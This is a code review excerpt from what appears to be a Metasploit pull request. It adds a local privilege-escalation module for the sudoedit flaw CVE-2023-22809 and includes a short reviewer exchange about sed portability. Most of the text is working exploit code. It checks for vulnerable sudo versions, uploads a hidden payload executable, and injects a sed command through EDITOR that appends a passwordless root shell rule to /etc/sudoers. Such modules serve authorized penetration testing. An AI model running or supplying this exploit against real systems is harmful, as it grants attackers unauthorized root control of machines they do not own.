modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb

```diff
@@ -0,0 +1,177 @@
+    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
+    package = package.split(' ')[2] # ii, package name, version, arch
+    sys_info = get_sysinfo
+    ver_no = Rex::Version.new(package)
+
+    # according to CVE listing, but so much backporting...
+    minimal_version = '1.8.0'
+    maximum_version = '1.9.12p1'
+
+    # backporting... so annoying.
+    # https://ubuntu.com/security/CVE-2023-22809
+    if sys_info['distro'] == 'ubuntu'
+      if sys_info['version'].include? '22.10' # kinetic
+        maximum_version = '1.9.11p3-1ubuntu1.1'
+      elsif sys_info['version'].include? '22.04' # jammy
+        maximum_version = '1.9.9-1ubuntu2.2'
+      elsif sys_info['version'].include? '20.04' # focal
+        maximum_version = '1.8.31-1ubuntu1.4'
+      elsif sys_info['version'].include? '18.04' # bionic
+        maximum_version = '1.8.21p2-3ubuntu1.5'
+      elsif sys_info['version'].include? '16.04'  # xenial
+        maximum_version = '1.8.16-0ubuntu1.10+esm1'
+      elsif sys_info['version'].include? '14.04'  # trusty
+        maximum_version = '1.8.9p5-1ubuntu1.5+esm7'
+      end
+    end
+
+    if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)
+      vprint_good("sudo version #{ver_no} is vulnerable")
+      # check if theres an entry in /etc/sudoers that allows us to edit a file
+      editable_file = get_editable_file
+      if editable_file.nil?
+        return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")
+      else
+        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")
+      end
+    end
+
+    CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")
+  end
+
+  def exploit
+    # Check if we're already root
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    if get_editable_file.nil?
+      fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup(payload_path)
+
+    timeout = 5 # anything more than this we're stuck at a 'enter password' prompt
+    @flag = Rex::Text.rand_text_alphanumeric(12)
+    print_status 'Adding user to sudoers'
+    # we tack on a flag so we can easily grep for this line and clean it up later
+    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
```

Comment:
`-i` is specific to gnu's sed, and might not work everywhere.

Reply:
I'm willing to risk it. In the yet to be released MD I explain trying other strategies and how/why they didn't work. Again, if anyone wants to add in a new/better strategy, that'd be great!